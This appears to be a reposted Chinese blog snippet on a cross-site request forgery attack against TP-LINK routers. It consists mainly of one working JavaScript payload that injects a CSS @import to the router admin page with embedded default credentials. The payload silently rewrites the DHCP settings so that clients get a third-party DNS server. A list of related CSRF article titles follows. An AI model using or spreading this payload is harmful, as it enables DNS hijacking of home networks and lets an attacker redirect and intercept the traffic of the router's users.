TP-LINK的CSRF攻击

Posted journeyIT

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了TP-LINK的CSRF攻击相关的知识,希望对你有一定的参考价值。

写了一个style标签import一个css调用:
document.writeln(‘<style type="text/css">@import url(http://admin:[email protected]/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6);</style>‘)

以上是关于TP-LINK的CSRF攻击的主要内容,如果未能解决你的问题,请参考以下文章

44. CSRF 攻击与防御

csrf攻防-攻击&防护代码演示

csrf攻防-攻击&防护代码演示

详解CSRF漏洞攻击

CSRF通过DVWA教你学会CSRF攻击

什么是CSRF攻击?什么是XSS攻击?解决方案有哪些?